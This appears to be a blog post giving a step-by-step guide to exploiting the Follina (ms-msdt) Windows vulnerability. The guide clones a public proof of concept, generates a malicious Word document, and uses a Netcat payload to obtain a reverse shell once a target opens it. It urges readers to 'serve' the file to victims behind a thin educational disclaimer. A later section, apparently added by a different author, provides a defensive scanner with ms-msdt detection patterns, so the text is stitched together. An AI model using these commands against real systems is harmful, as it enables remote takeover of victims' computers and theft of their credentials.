Exploitation guide for Follina

Some European governments have been the target of a phishing campaign that uses malicious rich text documents (RTF, Rich Text Format). These documents were designed to exploit a critical (zero-day) Windows vulnerability known as Follina.


The attackers used promises of salary increases to get employees to open documents containing a malicious PowerShell script.

With the PowerShell script of this attack, attackers are able to gather large amounts of information:

Browser passwords: Google Chrome, Mozilla Firefox, Microsoft Edge, Opera, Yandex, Vivaldi, CentBrowser, Comodo, CheDot, Orbitum, Chromium, Slimjet, Xvast, Kinza, Iridium, CocCoc and AVAST Browser.

Data from other applications: Mozilla Thunderbird, Netsarang session files, Windows Live Mail contacts, Filezilla passwords, ToDesk configuration file, WeChat, Oray SunLogin RemoteClient, MailMaster, ServU, Putty, FTP123, WinSCP, RAdmin, Microsoft Office, Navicat.

Information from Windows: Computer information, username list, Windows domain information

Let's now see how Follina can be used to gain access to a Windows machine.

First we download the msdt-follina proof of concept with the following command:

git clone https://github.com/JohnHammond/msdt-follina

It will show us the following results:

[Screenshot: cloning the msdt-follina GitHub repository]

Then we type the following commands:

cd msdt-follina

python3 follina.py -i X.X.X.X


In the above command X.X.X.X is our IP address. In the screenshot below we can see that our malicious .doc file has been created and that the script is starting the listener for the HTML payload on port 8000.

[Screenshot: follina.py starting and serving the HTML payload on port 8000]

So we see the malicious file we just made in our files (in the directory msdt-follina), as the screenshot below shows:

[Screenshot: the generated malicious document in the msdt-follina directory]

At this point we have to use our knowledge and our brains to "serve" the malicious file to the target and get remote access to their machine.

Every time the target opens the file and clicks "Enable Editing" in MS Word (older versions of MS Office do not require this; the payload runs directly), a connection comes back to our listener, as you can see in the screenshot below:

[Screenshot: reverse connection received by the listener]

By default, the script opens the Windows Calculator application.

[Screenshot: Windows 10 virtual machine in VirtualBox with Calculator opened]

The script can do much more: if we create the payload with the following command, we get a shell directly:

python3 follina.py -r 7777

In the above command we use port 7777 for the payload's connection, but any unused port will do.

The above command will create a Netcat payload and start the listener and then create a DOC file in the directory msdt-follina. After our target clicks “Enable Editing”, we will successfully get access as we can see in the screenshot below:

[Screenshot: shell obtained on the Windows PC]

Now we can do anything the user of the victim computer can do. This vulnerability is not likely to be patched for at least some time yet. Our article is inspired by our friend NetworkChuck's YouTube video, which you can watch below (we made small changes to avoid errors):

Warning: This article is for educational purposes only. We did it on our own system and didn't hurt anyone. You should do the same.

How to be safe from Follina?

Microsoft published an article that shows how we can protect ourselves from Follina exploitation. But, as we know, the first rule is not to open suspicious links or files from the internet.
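As an added defensive example (not code from the original post or from the msdt-follina project), the Python script below triages incoming Office documents for the two indicators that a Follina document carries: an OLE object relationship whose target is External (the document pulls its content from a remote location instead of embedding it) and any occurrence of the ms-msdt: URL scheme inside the archive. It also reports, on Windows hosts only, whether the ms-msdt protocol handler that the exploit relies on is still registered, which is the setting Microsoft's published workaround removes. All function names are mine, the sample documents are constructed skeletons built in memory, and the URL in them is a placeholder.

```python
"""Defensive triage for Follina-style Office documents (added example).

Not part of the original post or the msdt-follina project. Flags:
  1. a relationship part (.rels) that links an OLE object to an External
     target, which is how a Follina document fetches remote content;
  2. any occurrence of the "ms-msdt:" URL scheme inside the archive.
Sample documents are constructed here; the URL in them is a placeholder.
"""
import io
import re
import zipfile
from typing import List, Optional
from xml.etree import ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
HYPERLINK_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                      "relationships/hyperlink")
MSDT_SCHEME = re.compile(rb"ms-msdt:", re.IGNORECASE)


def scan_docx_bytes(data: bytes) -> List[str]:
    """Return human-readable findings for one .docx/.dotx held in memory."""
    findings: List[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            content = zf.read(name)
            # Relationship parts record where every embedded object comes from.
            # Ordinary hyperlinks are External too, so only OLE objects count.
            if name.endswith(".rels"):
                root = ET.fromstring(content)
                for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                    external = rel.get("TargetMode") == "External"
                    if external and rel.get("Type") == OLE_REL_TYPE:
                        findings.append(
                            f"{name}: OLE object loaded from external target "
                            f"{rel.get('Target')}")
            # The troubleshooter scheme has no business inside a document.
            if MSDT_SCHEME.search(content):
                findings.append(f"{name}: contains an ms-msdt: URL")
    return findings


def scan_docx_file(path: str) -> List[str]:
    """Convenience wrapper for scanning a document on disk."""
    with open(path, "rb") as fh:
        return scan_docx_bytes(fh.read())


def build_sample(external_ole: bool) -> bytes:
    """Build a minimal constructed .docx skeleton for exercising the scanner.

    The benign variant still carries an External hyperlink, which must not be
    flagged; the suspicious variant adds an External OLE object pointing at a
    placeholder URL.
    """
    rels = [
        ('<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
         'officeDocument/2006/relationships/styles" Target="styles.xml"/>'),
        (f'<Relationship Id="rId2" Type="{HYPERLINK_REL_TYPE}" '
         'Target="https://example.invalid/" TargetMode="External"/>'),
    ]
    if external_ole:
        rels.append(
            f'<Relationship Id="rId3" Type="{OLE_REL_TYPE}" '
            'Target="http://PLACEHOLDER.invalid/page.html" TargetMode="External"/>')
    rels_xml = (f'<Relationships xmlns="{REL_NS}">' + "".join(rels)
                + "</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")   # placeholder part
        zf.writestr("word/document.xml", "<w:document/>")  # placeholder part
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def msdt_handler_registered() -> Optional[bool]:
    """Windows only: is the ms-msdt URL handler still present in HKCR?

    Returns None on non-Windows hosts. Microsoft's published workaround
    deletes HKEY_CLASSES_ROOT\\ms-msdt after exporting a backup, so False
    means that workaround (or a later update) is in place.
    """
    try:
        import winreg
    except ImportError:
        return None
    try:
        with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT,
                            r"ms-msdt\shell\open\command") as key:
            command, _ = winreg.QueryValueEx(key, "")
    except OSError:
        return False
    return "msdt" in str(command).lower()


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        for finding in scan_docx_file(path):
            print(f"[!] {path}: {finding}")
    print("ms-msdt handler registered:", msdt_handler_registered())
```

Run it as `python3 follina_triage.py suspicious.docx` on a mail gateway or analyst workstation; a hit on the External OLE relationship is the strongest signal, because a legitimate document embeds its objects rather than fetching them at open time. The scanner only reads the archive and never renders the document, so it is safe to run on untrusted files.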

Things could be worse than we think because there may be many 0days that we don't know about.


Written by Anastasis Vasileiadis
